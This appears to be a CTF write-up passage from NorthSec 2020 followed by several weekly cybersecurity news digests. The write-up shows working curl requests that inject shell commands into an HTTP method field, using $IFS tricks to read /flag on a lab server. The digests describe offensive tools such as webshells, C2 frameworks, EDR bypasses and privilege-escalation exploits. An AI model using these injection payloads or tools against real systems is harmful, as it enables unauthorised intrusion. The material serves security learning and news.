   0x76340b <main.main+59>:     lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>
   0x763412 <main.main+66>:     mov    QWORD PTR [rax],rcx
   0x763415 <main.main+69>:     lea    rcx,[rip+0x156504]        # 0x8b9920
=> 0x76341c <main.main+76>:     mov    QWORD PTR [rax+0x8],rcx
   0x763420 <main.main+80>:     nop
   0x763421 <main.main+81>:     mov    rcx,QWORD PTR [rip+0x3ea038]        # 0xb4d460 <net/http.DefaultServeMux>
   0x763428 <main.main+88>:     mov    QWORD PTR [rsp],rcx
   0x76342c <main.main+92>:     lea    rcx,[rip+0xd6596]        # 0x8399c9
[------------------------------------stack-------------------------------------]
0000| 0xc000101ef8 --> 0x7d3200 --> 0x10 
0008| 0xc000101f00 --> 0xc0000fa0f0 --> 0x8c2ca0 --> 0x7cc380 --> 0x10 
0016| 0xc000101f08 --> 0xc000000180 --> 0xc000100000 --> 0xc000102000 --> 0x0 
0024| 0xc000101f10 --> 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:  mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
0032| 0xc000101f18 --> 0x40714f (<runtime.closechan+479>:       jmp    0x40716e <runtime.closechan+510>)
0040| 0xc000101f20 --> 0xc000086058 --> 0x0 
0048| 0xc000101f28 --> 0x0 
0056| 0xc000101f30 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x000000000076341c      716     // "index.html".

Look at the string in RCX: static/. That's where the static files must be loaded from. We know that script.js and styles.css exist since they are loaded when we browse to / on the challenge server, so if we overwrite either of those and browse to them, we should get our command output!

At this point, my team and I tried many, many different Bash tricks to get command output locally. A breakthrough came when one teammate suggested using $* to separate $IFS from the next string. This allowed us to create spaces. I was excited. We had a clear path to the flag, and we just needed to locate and cat it. I ran the following expectantly:

$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \ 
-X '&&cd$IFS$*static&&find$IFS..|tee$IFS$*styles.css' >/dev/null`
$ curl time-server.ctf:8080/styles.css
..
../.bash_logout
../.bashrc
../.profile
../static
../static/script.js
../static/styles.css
../static/index.html
../static/time_server
../.viminfo
../main
../^time.json
../+time.json
../+outfile
../styles.css
../+outoutout
../index.html
../en_US.UTF-8
../test.html
../index.html.1
../time.json

travolta

Among the clutter of our output files, there was no flag. Fine, I'll just run find on the whole filesystem and grep the output. However, we can't use slashes, so find / is impossible. Here we could have cd .. a few times to get to / and then run find . but I was focused on using a slash. After a bunch more failed attempts I had this

$ # The command is: echo && cd static && ls -dF | tr -d . | tee styles.css
$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&ls$IFS-dF|tr$IFS-d$IFS$*.|tee$IFS$*styles.css' >/dev/null

$ curl time-server.ctf:8080/styles.css
/

Great, now I can save a / character to a file and then cat that file to use / in the command.

$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&ls$IFS-dF|tr$IFS-d$IFS$*.|tee$IFS$*slash' >/dev/null

$ # The command is: echo && cd static && find / | tee style.css
$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&find$IFS$*`cat$IFS$*slash`|tee$IFS$*styles.css' >/dev/null

$ # A suspiciously long time later, the curl returns
$ wget time-server.ctf:8080/styles.css

styles.css was 64MB of find output. Undeterred, I was so close to the flag the size didn't slow me down.

$ grep -i flag styles.css 
/proc/sys/kernel/acpi_video_flags
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu0/domain1/flags
/proc/sys/kernel/sched_domain/cpu0/domain2/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain1/flags
/proc/sys/kernel/sched_domain/cpu1/domain2/flags
/proc/sys/kernel/sched_domain/cpu2/domain0/flags
/proc/sys/kernel/sched_domain/cpu2/domain1/flags
/proc/sys/kernel/sched_domain/cpu2/domain2/flags
/proc/sys/kernel/sched_domain/cpu3/domain0/flags
/proc/sys/kernel/sched_domain/cpu3/domain1/flags
/proc/sys/kernel/sched_domain/cpu3/domain2/flags
/proc/sys/kernel/sched_domain/cpu4/domain0/flags
/proc/sys/kernel/sched_domain/cpu4/domain1/flags
/proc/sys/kernel/sched_domain/cpu4/domain2/flags
/proc/sys/kernel/sched_domain/cpu5/domain0/flags
/proc/sys/kernel/sched_domain/cpu5/domain1/flags
/proc/sys/kernel/sched_domain/cpu5/domain2/flags
/proc/sys/kernel/sched_domain/cpu6/domain0/flags
/proc/sys/kernel/sched_domain/cpu6/domain1/flags
/proc/sys/kernel/sched_domain/cpu6/domain2/flags
/proc/sys/kernel/sched_domain/cpu7/domain0/flags
/proc/sys/kernel/sched_domain/cpu7/domain1/flags
/proc/sys/kernel/sched_domain/cpu7/domain2/flags
/proc/kpageflags

oh come on

No flag. Impossible. There had to be a flag. I asked the organizers to check our VM. The flag was there they said. Frantic, I used my newfound slash abilities to ls /. In retrospect, the find likely timeout and was killed by time_server before it could list /flag.

$ # The command is: echo && cd static && ls / | tee styles.css
$ curl -v time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&ls$IFS$*`cat$IFS$*slash`|tee$IFS$*styles.css' >/dev/null

$ curl time-server.ctf:8080/styles.css
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

$ # The command is: echo && cd static && cat /flag | tee styles.css
$ curl -v time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&cat$IFS$*`cat$IFS$*slash`flag|tee$IFS$*styles.css' 

$ curl time-server.ctf:8080/styles.css
FLAG-ac0c58453b7208f9ee9d204b54988b98

score

I am positive there were simpler ways to solve this challenge, but no one can take away the feeling of finally getting a challenge after struggling for hours.

NSEC 2020 was a ton of fun, and we'll be back next year.

Last Week in Security (LWiS) - 2020-05-25

By: Erik
26 May 2020 at 00:20

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-05-18 to 2020-05-25. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • Privacy News
    • Why is This Website Port Scanning me? Websockets are being used for "anti-fraud" scans of website user's local machines. The theory is that if a user is running a VNC or other remove desktop server, they may be part of a botnet/click farm operation I suppose. If you are a developer this could be especially dangerous. In Firefox, setting network.websocket.max-connections to 0 will disable websockets, but lots of modern web applications rely on them.
    • Abusing WebRTC to Reveal Coarse Location Data in Signal abused WebRTC on both iOS and Android in order to reveal the user's ENDS client subnet, which could reveal a rough location (~400 mile radius). The bug has been patched in the latest version of Signal.
  • macOS 10.15 Catalina notarization news
    • Catalina is checking notarization of unsigned executables started the firestorm, bringing to light that macOS sends the hash of every executable not whitelisted in System Preferences as a "Developer Tool" to Apple.
    • How my application ran away and called home from Redmond is an example of arguably more invasive behavior on Windows. Additionally, "SmartScreen" also profiles and reports "usual" executions to Microsoft.
    • This effectively gives Apple a list of binaries being run by every user, without a way to disable it (besides going fully offline).
    • Inside the NSA’s Secret Tool for Mapping Your Social Network shows the power of massive metadata collection, and its ability for misuse. Perhaps tomorrow Apple receives a request for all users that have run the Tor browser in your country.
    • A happy medium would be to push a bloom filter of known hashes to end users and perform local lookups, only sending hashes that don't hit the bloom filter to Apple for further analysis. This is what Google Chrome does for phishing site lookups (until Enhanced Safe Browsing Protection is enabled). Users should also be given the ability to opt out of such features.
  • New DNS Vulnerability Lets Attackers Launch Large-Scale DDoS Attacks With up to 1000x traffic amplification, this will likely see exploitation soon. If you are responsible for DNS severs, patch them quickly.
  • GitLab 13.0 released with many new changes. The biggest for most users will likely be the new "Deploy to Amazon ECS" that makes AWS a first class citizen for deployments and monitoring on par with previously supported Google Cloud.
  • Enhanced Safe Browsing Protection now available in Chrome will check uncommon URLs in real time. Phishing against Chrome users just got harder.
  • Jailbreak for iOS 11.0-13.5 for all iOS devices released. After a few tough iOS releases, the jailbreaking scene is back in full force. First checkra1n, and now a fast, reliable jailbreak for every iOS device on the latest, signed version. Hats off to the hackers that have kept pushing Apple despite new security additions to iOS (i.e. Pointer Authentication). Why release this 0day now? Perhaps the iOS 14 leak gave the jailbreak developers enough insight to see that it was patched. Add build.frida.re to your cydia repo list and start hacking those iOS apps! [T1068 Exploitation for Privilege Escalation]

Techniques

Tools and Exploits

  • ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection using TLS certificate with elliptical curve cryptography. Think of it as Meterpreter with Autoroute + Socks4a, but more stable and faster. This can be used stand-alone or incorporated into an in-house Go tool. [TA0008 Lateral Movement]
  • njsscan is a semantic aware SAST tool that can find insecure code patterns in your Node.js applications.
  • axiom is a set of utilities for managing a small dynamic infrastructure setup for bug bounty and pentesting. If you are a Digital Ocean user and want an easy way to spin up red teaming or bug bounty infrastructure, this may be the tool for you.
  • Cisco AnyConnect < 4.8.02042 privilege escalation through path traversal. It wouldn't be last week in security without a Windows local privilege escalation. This standalone C# exploit uses DLL hijacking with vpndownloader.exe, the update binary for Cisco AnyConnect. I suspect this particular exploit will be useful for many months as enterprises are slow to update their VPN clients. [T1068 Exploitation for Privilege Escalation]
  • WerTrigger is a powerful new primitive to weaponize file write exploits. Prior to Windows 10 1909 there was the DiagHub DLL loading primitive, but since then we have only had UsoDllLoader. Now there is another option, and when the next file write exploit is found that allows unprivileged users to write files to C:WindowsSystem32, WerTrigger will be there to pop the SYSTEM shell. [T1068 Exploitation for Privilege Escalation]
  • XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully running the code. [T1066 Indicator Removal from Tools]
  • shotlooter is a recon tool that finds sensitive data inside the screenshots uploaded to prnt.sc.
  • petaqc2 is a .NET Core/Framework RAT that uses websockets as Command & Control (C2) channels. It's designed to provide a Proof of Concept (PoC) websocket malware to the adversary simulation exercises (Red & Purple Team exercises).
  • quickreg is an experimental search engine for developers. It searches a curated subset of the web: official docs and community-driven sources. No JS, cookies, tracking, external requests or data collecting.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • guardedbox Online client-side manager for secure storage and secrets sharing. This could be useful for sharing scope lists, reports, or other sensitive information with clients that don't use PGP or are unable to use your encrypted email solution.
  • jaeles is a powerful, flexible, and easily extensible framework written in Go for building your own Web Application Scanner.
  • maddy is a composable all-in-one mail server. If you have ever spent half a day setting up a phishing mail server by hand, the short setup docs for maddy should get you excited. Two commands (and DNS setup) and you have DKIM, SPF, DMARC, MTA-STS, DANE, and STARTTLS Everywhere.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-06-01

By: Erik
1 June 2020 at 17:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-05-25 to 2020-06-01. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • Israeli cyber chief: Major attack on water systems thwarted. A cyber attack was reportedly detected and thwarted in real time and had it not be chlorine or other chemicals could have been mixed into the water source in the wrong proportions and resulted in a “harmful and disastrous” outcome. Israel's national cyber chief said, “Cyber winter is coming and coming even faster than I suspected. We are just seeing the beginning.”
  • Return of the iOS sandbox escape: lightspeed's back in the race!! Synacktiv describes the old-but-new XNU bug that was re-introduced in iOS 13 and was the basis for last week's iOS 0day based jailbreak. [T1068 Exploitation for Privilege Escalation]
  • Zero-day in Sign in with Apple Speaking of Apple's mistakes, this one is quite bad. When requesting a JSON web token during the "Sign in with Apple" process, swapping the email for another user would return a valid JWT that can authenticate to the 3rd party service. This is the equivalent to editing a cookie from "user" to "admin" and getting the admin page. How this got through internal testing and into production is beyond me. [T1078 Valid Accounts]
  • LadderLeak: Breaking ECDSA With Less Than One Bit Of Nonce Leakage describes how a novel side-channel vulnerability can lead to leaking the most significant bit of the nonce and eventually breaking ECDSA, including NIST curves like P-192 (P-256 is vulnerable in theory). Curve25519 contains a countermeasure against this attack, but, "its exact efficacy against side-channel attacks in [this] context is not entirely clear."
  • Releasing the CAPTCHA Cracken. Despite the name there is no tool release, but F-Secure Labs shows off its ability to automate the CAPTCHA in use with the Office 265 Outlook Web Application, allowing its red team to attempt password stuffing. If you solely rely on CAPTCHA to stop bots/automated tools, it's time to rethink your strategy. Demo here.

Techniques

Tools and Exploits

  • httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
  • Seatbelt, while technically not a new tool got a huge rewrite. Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. [T1082 System Information Discovery]
  • BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack. [T1040 Network Sniffing]
  • angry_gadget - This tool is written in python and uses angr to test constraints for gadgets executing execve('/bin/sh', NULL, NULL). If you've run out gadgets to try from OneGadget, Angry Gadget gives a lot more with complicated constraints to try!
  • ezEmu enables users to test adversary behaviors via various execution techniques. Sort of like an "offensive framework for blue teamers", ezEmu does not have any networking/C2 capabilities and rather focuses on creating local test telemetry. Use this (or atomic-red-team) to test your SEIM, EDR, or SOC response.
  • EXCELntDonut is a XLM (Excel 4.0) macro generator. Start with C# source code (DLL or EXE) and end with a XLM (Excel 4.0) macro that will execute your code in memory. XLM (Excel 4.0) macros can be saved in .XLS files. [T1193 Spearphishing Attachment]
  • sgn Shikata ga nai encoder ported into go with several improvements including 64 bit support, smaller decoder stub, no visible loop condition, decoder stub obfuscation, and safe register option. Build this into your in house packer for better obfuscation. [T1066 Indicator Removal from Tools]
  • Corporate_Masks are 8-14 character Hashcat masks based on analysis of 1.5 million NTLM hashes cracked while pentesting. [T1078 Valid Accounts]
  • AMSITrigger will identify all of the malicious strings in a powershell file, by repeatedly making calls to AMSI using AMSIScanBuffer, line by line. On receiving an AMSI_RESULT_DETECTED response code, the line will then be scrutinised to identify the individual triggers. [T1066 Indicator Removal from Tools]

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-06-08

By: Erik
9 June 2020 at 00:35

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-01 to 2020-06-08. No MITRE ATT&CK techniques are in brackets this week, too much content!

News

Techniques

Tools and Exploits

  • epic_shell is a new PHP webshell with encryption that shows a decoy 404 page for anyone browsing it without the proper key. shell_exec is required for proper functionality.
  • SMBGhost_RCE_PoC is the remote version of the LPE released a few months ago that works against Windows 10 1903 (SMBv3 compression). Full technical writeup here.
  • CVE-2020-3956 is a proof of concept exploit for a VMware Cloud Director remote code execution vulnerability. Full writeup here, demo here.
  • Covenant v0.5 is not a new tool but this update includes a new cross platform .Net-Core implant: Brutes.
  • shad0w is a post exploitation framework designed to operate covertly on heavily monitored environments from @_batsec_ and is written in C, uses syscalls, blocks userland API hooking, and can load basically anything (.Net, DLL, EXE, VBS, JS, XSL) into memory. Code here.
  • kerbrute is a script to perform kerberos bruteforcing by using impacket.
  • HawkEye is a malware dynamic instrumentation tool based on frida.re framework. It will hook common functions to log malware activities and output the results in a nice web page report. Use it in your sandbox to get nice HTML reports. Demo here.
  • SharpCollection is a repository of nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines. Great use of CI to keep tools fresh and built for different framework versions.
  • SwiftBelt is a macOS enumerator inspired by @harmj0y's Windows-based Seatbelt enumeration tool. SwiftBelt does not utilize any command line utilities and instead uses Swift code (leveraging the Cocoa Framework, Foundation libraries, OSAKit libraries, etc.) to perform system enumeration. This can be leveraged on the offensive side to perform enumeration once you gain access to a macOS host. I

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way. This one is fairly new (30 days) so it must have slipped by, but looks to have very good results for a one shot subdomain enumeration tool. Give it a try on your next assessment or bug bounty.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-06-15

By: Erik
16 June 2020 at 20:50

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-08 to 2020-06-15. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • penglab - Abuse of Google Colab for fun and profit. Google Colab is a free cloud service based on Jupyter Notebooks for machine-learning education and research. It provides a runtime fully configured for deep learning and free-of-charge access to a robust GPU. I'm surprised it took this long to get abused.

  • Windows Local Privilege Escalation [T1068 Exploitation for Privilege Escalation]

    • Windows: Insecure CSharedStream Object EoP The great @tiraniddo develops his 8 month old "Won't Fix" Windows local privilege escalation bug into a full blown normal user to SYSTEM PoC. Expect to see this weaponized and in use in by next week and have a long shelf life.
    • VirtToPhys is a small PoC to demonstrate how you can calculate the physical address for a kernel virtual address when exploiting driver bugs that allow you to map physical memory. VirtToPhys uses MsIo.sys, a WHQL signed driver that gives you colorful lights on your RAM (yes, seriously), CVE-2019-18845.
    • SuRestore.cpp - If you find yourself in the Backup Operators group, this little gem based on older research may be able to get you a SYSTEM shell.
    • spoolsystem is a CNA script for Cobalt Strike which uses @itm4n Print Spooler named pipe impersonation trick (LWiS 2020-05-18) to gain SYSTEM privileges without creating any new process or relying on cross-process shellcode injection (if the selfinject method is used).
  • libimobiledevice is a collection of projects that allow for cross-platform protocol library to access iOS devices. This is the first release after a three year hiatus, and sees the release of two new tools, libirecovery and idevicerestore.

  • SearchOutlook is a C# tool to search through a running instance of Outlook for keywords.

  • choose is a human-friendly and fast alternative to cut and (sometimes) awk. This may prove useful for cleaner pipelines for automated reconnaissance, etc.

  • SharpBlock is a method of bypassing EDR's active projection DLL's by preventing entry point execution. Blog post here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • UtahFS is an encrypted storage system that provides a user-friendly FUSE drive backed by cloud storage in Go by CloudFlare. Use this to store things securely in the cloud - think DropBox but encrypted locally before upload.
  • Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS. The tool is based on returned status code.
  • urlcrazy generates and tests domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage.
  • PowerSharpPack is many useful offensive CSharp Projects wrapped into Powershell for easy usage.
  • revp is a C++ reverse HTTP proxy that works on Linux, Windows, and macOS.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-06-22

By: Erik
22 June 2020 at 14:10

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-15 to 2020-06-22. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • CobaltStrike: Beacon Object Files - CobaltStrike continues to deliver advanced adversary emulation capabilities. This update brings the ability for a beacon to run compiled code in its own context, with beacon itself taking care of linking and loading the object file. This provides massive OPSEC advantages over forking a new process, but does come with a few downsides - crashing your shiny new BOF crashes your beacon. I expect lots of new techniques to come out with BOF implementations in the future to frustrate AV/EDR. Demo here.
  • Advisory 2020-008: Copy-paste compromises - tactics, techniques and procedures used to target multiple Australian networks. The Australian Government has officially stated that a "sophisticated state-based actor" is targeting the Australian government and Australian companies. While they don't name a country, it doesn't take an expert in foreign policy to pick China as the overwhelming favorite for this attack.
  • Dark Basin Uncovering a Massive Hack-For-Hire Operation. Citizenlab exposes BellTroX, an Indian hack-for-hire firm, due to their shockingly bad OPSEC. Using your own real CV to test a URL shortener?! The reader is left to wonder how many similar operations are taking place, but with better OPSEC. Want to know more? The great Risky Business has a feature podcast all about it.
  • FBI used Instagram, an Etsy review, and LinkedIn to identify a protestor accused of arson. Another OPSEC fail; if Bellingcat can do good OSINT, law enforcement can too. Wearing a shirt you can only get from an Etsy seller means your address is one subpoena away. Looks like the alleged arsonist didn't read OPSEC for Activists: #5 - Choose your clothing carefully.
  • Apple plays Godfather in Mafia-esque shakedown of developers. This is the same battle Spotify has been fighting. It boils down to Apple demanding 30% of signup fees for signups in an app on iOS. That is perhaps at the edge of reasonable, but now they are removing apps that have signups outside the app but have no ability to sign up in app (think Netflix, Spotify, etc). This policy is inconsistently enforced, and targeting a very vocal David Heinemeier Hansson is a mistake. Apple then sent out this message to developers before WWDC! First the Coreillium debacle and now this? Who is making these calls at Apple?
  • Hacking Starbucks and Accessing Nearly 100 Million Customer Records. A proxy between the Starbucks frontend and backend allowed researches to access a Microsoft Graph instance with nearly 100 million customer records. They reported the issue as soon as they verified they could access the base records, but there were lots of interesting endpoints that didn't get explored and would likely have been even more damaging. The $4,000 bounty for this seems extremely low.
  • Flatpak - a security nightmare. App distribution on Linux isn't great, and Flatpak from RedHat tried to solve that. Sadly, it looks as though they have some significant work to do on the security front.
  • 19 Zero-Day Vulnerabilities Amplified by the Supply Chain. The so-called "Ripple 20" vulnerabilities effect the TCP/IP library by Treck, Inc. Never heard of Treck's TCP/IP library? I hadn't either, but it's in everything from the UPS in your server rack, your printer, and the infusion pump in your operating room. Remote code execution with a malformed IPv4 packet is about as bad as a vulnerability gets, but the really scary vulnerability is the RCE from a nearly RFC compliant DNS response. State backed attackers or others with the ability to do DNS cache poisoning are going to be very excited by this. Expect to see these vulnerabilities in network attached UPSs and other IoT devices on assessments for the next decade. @SwitHak has put together a list of vulnerable vendors/devices as well as network detection rules: BlueTeam CheatSheet.

Techniques

Tools and Exploits

  • Digging Your Talons In – New Take On Password Guessing. The researches at Optiv spent some time seriously considering how to do password guessing right, and boy did they develop quite a tool. Talon takes password guessing attacks to a new level with tricks like not sending an encryption type with a TGT request to kerberos which allows username enumeration without any failed logons (i.e. won't lock accounts). It also intelligently detects account lockouts over both kerberos and LDAP, and will rotate attempts between different domain controllers if multiple are present. Best of all, both the Kerberos TGT request and LDAP BIND auth request are not logged by default. Spray away! [T1078.002 Valid Accounts: Domain Accounts]
  • Composr CMS Remote Code Execution. This post shows the process of finding and exploiting a PHP unserialize function to achieve unauthenticated remote code execution. [T1190 Exploit Public-Facing Application]
  • USBSamurai — A Remotely Controlled Malicious USB HID Injecting Cable for less than 10$. If the O.MG cable is out of your price range, this might be more your style. All in this cable and the wireless dongle is less than $25 as long as you are willing to solder it up yourself. [T1200 Hardware Additions]
  • OutlookSend is a C# tool to send emails through Outlook from the command line or in memory. Designed to be used through execute-assembly in your favorite C2 Framework (i.e. CobaltStrike). Use this in companion with last week's SearchOutlook.
  • Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. Cyberark has a great writeup with demo on their blog. This is going to automate a lot of work on your next assessment with AppLocker; it even takes screenshots and generates a report! Cyberark neutered the tool a bit by not including the DLLs or other files used to pop shells, but I'm sure the community will fork and update the project soon. Blue teams using AppLocker should use this for self-assessment, and determine how to detect bypasses using other tools. [Thanks to @StevoLowson for the tip!]
  • ADSearch is a tool written for cobalt-strike's execute-assembly command that allows for more efficient querying of AD. [T1087.002 Account Discovery: Domain Account]
  • CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability. At this point @itm4n has made it into the hall of fame of Windows exploiters. This week sees yet another local elevation of privilege vulnerability, using Windows Defender's log rotation mechanism to delete an arbitrary directory. From directory deletion to SYSTEM shell gets you the rest of the way. By setting the defender update source to the local machine, the log can be filled in ~40 minutes. This post is very thorough and walks through the entire process of finding the vulnerability - top notch reporting.
  • avcleaner is a C/C++ source obfuscator for antivirus bypass. The researchers at SCRT really got into the weeds of clang/LLVM with this tool and came out with a FUD meterpreter. The blog post is very much worth a read.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-06-29

By: Erik
29 June 2020 at 17:20

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-22 to 2020-06-29. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • Cobalt Strike 4.1 – The Mark of Injection. The beacon object files feature teased last week has been released along with improved safe-inject and more tunable SMB and TCP traffic parameters to defeat signature based detections.
  • 2020 Worldwide Developers Conference. Apple announced a lot, but the big news was the 2-year transition of macOS to custom ARM chips. iOS exploit developers just got a whole new target space! The A12X powered Developer Transition Kits (ARM based Mac Mini) have started to arrive, and it's only a matter of time before security researchers get their hands on some.
  • WireGuard Merged Into OpenBSD. Get ready for native WireGuard in the kernel in pfSense and OPNSense firewalls.
  • Moroccan Journalist Targeted With Network Injection Attacks Using NSO Group’s Tools. "Network Injection" attacks and rouge cell towers, this thorough report from Amnesty International lays out in detail how NSO Group assisted the Moroccan government in performing exploitation of journalists. The evidence of NSO Group willfully ignoring how its products are used is mounting, and I wouldn't be surprised if they are next up on Phineas Fisher's hit list.

Techniques

Tools and Exploits

  • ChopChop is a CLI for scanning endpoints and identifying exposition of services/files/folders through the webroot. Add this to your tool list for web assessments or bug bounties.
  • Max is a command line tool to interact with the Neo4j database that powers BloodHound. This tool allows easy access to users and groups with lots of good built in filters. It also allows raw Cypher queries against the database for advanced users. [T1087.002 Account Discovery: Domain Account]
  • SharpHungarian is a rough proof of concept that uses comments on a VirusTotal file for command and control. [T1102.002 Web Service: Bidirectional Communication]
  • FileSearcher is an unmanaged assembly file searcher for when a fully interactive beacon session is not opsec safe enough. Find those Passwords.txt or Passwords.xlsx files easily with this tool. [T1005 Data from Local System]
  • Clippi-B is an unmanaged assembly clipboard stealer for use with CobaltStrike or any other unmanaged CLR loader (i.e. shad0w). [T1115 Clipboard Data]
  • pencode is a tool that helps you to create payload encoding chains. It has been designed to be used in automation wherever it is required to apply multiple encodings to a payload (and possibly inserting the payload to a template in between). This will be helpful for web application penetration testers or bug bounties.
  • browsertunnel is a tool for exfiltrating data from the browser using the DNS protocol. It achieves this by abusing dns-prefetch, a feature intended to reduce the perceived latency of websites by doing DNS lookups in the background for specified domains. DNS traffic does not appear in the browser's debugging tools, is not blocked by a page's Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios. [T1071.004 Application Layer Protocol: DNS]
  • CVE-2020-10665 is a proof of concept for Docker Desktop Local Privilege Escalation on Windows. This is the same researcher from last week's Starbucks writeup. Well done! [T1068 Exploitation for Privilege Escalation]
  • CVE-2020-1054 is a proof of concept for a Windows 7 kernel vulnerability that leads to local privilege escalation. Blog post with details here. [T1068 Exploitation for Privilege Escalation]
  • BananaPhone is a pure-go implementation of using direct syscalls in the spirit of HellsGate (LWiS 2020-06-08). [T1027.005 Obfuscated Files or Information: Indicator Removal from Tools]

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • aviary.sh is a minimal distributed configuration management in bash. Each host periodically fetches the latest version of the inventory to see what roles it should be performing. If you have struggled with Ansible, Chef, Puppet, or Salt in the past or they were just too much for a simple configuration management job, give aviary.sh a shot. Need slightly more power but don't wan't to step all the way up to the "major" configuration managers? pyinfra might be what you are looking for.
  • Flatseal is a graphical utility to review and modify basic permissions from your Flatpak applications. If last week's news about Flatpak security got you worried, Flatseal can help audit applications or modify them for malicious redistribution during an assessment.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-07-06

By: Erik
6 July 2020 at 21:10

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-29 to 2020-07-06. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • Secretive is an app for storing and managing SSH keys in the Secure Enclave. It is inspired by the sekey project, but rewritten in Swift with no external dependencies and with a handy native management app. If you have a Mac or manage Macs this is another level of protection for SSH keys, and Macs without a secure enclave can use other sources such as a Yubikey.
  • velociraptor is a tool for collecting host based state information using Velocidex Query Language (VQL) queries. A simple to deploy single binary agent and server for incident response.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-07-13

By: Erik
13 July 2020 at 20:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-06 to 2020-07-13. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • CVE-2020-1300: Remote Code Execution Through Microsoft Windows CAB Files. The PathCchCanonicalize function strikes again, this time when opening a CAB file or installing a printer. In the case of the printer, arbitrary file write (and therefore remote code execution) is achieved as SYSTEM. No public proof of concepts exist yet, but there is enough detail in the post to craft your own.
  • Incoming .NET SQLClient introduces a .NET MSSQL client that can be used with any in-memory .NET loader (i.e. Cobalt Strike's execute-assembly) for use during post-exploitation activities. [TA0009 Collection]
  • tsunami-security-scanner is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence from Google. This scanner and nuclei are recent open source competitors to Tenable's Nessus.
  • SNOWCRASH creates a script that can be launched on both Linux and Windows machines. Payload selected by the user (in this case combined Bash and Powershell code) is embedded into a single polyglot template, which is platform-agnostic. I could see this being used for a cross-platform stage 1 payload against cross-platform target applications (i.e. Apache struts). [T1059 Command and Scripting Interpreter]
  • VBA-Stendhal injects encrypted commands into EMF shapes for C2 in VBA/Office malware. This is really cool Macro/VBA work by @Laughing_Mantis, and you can read more about how the technique works here. [T1562 Impair Defenses]
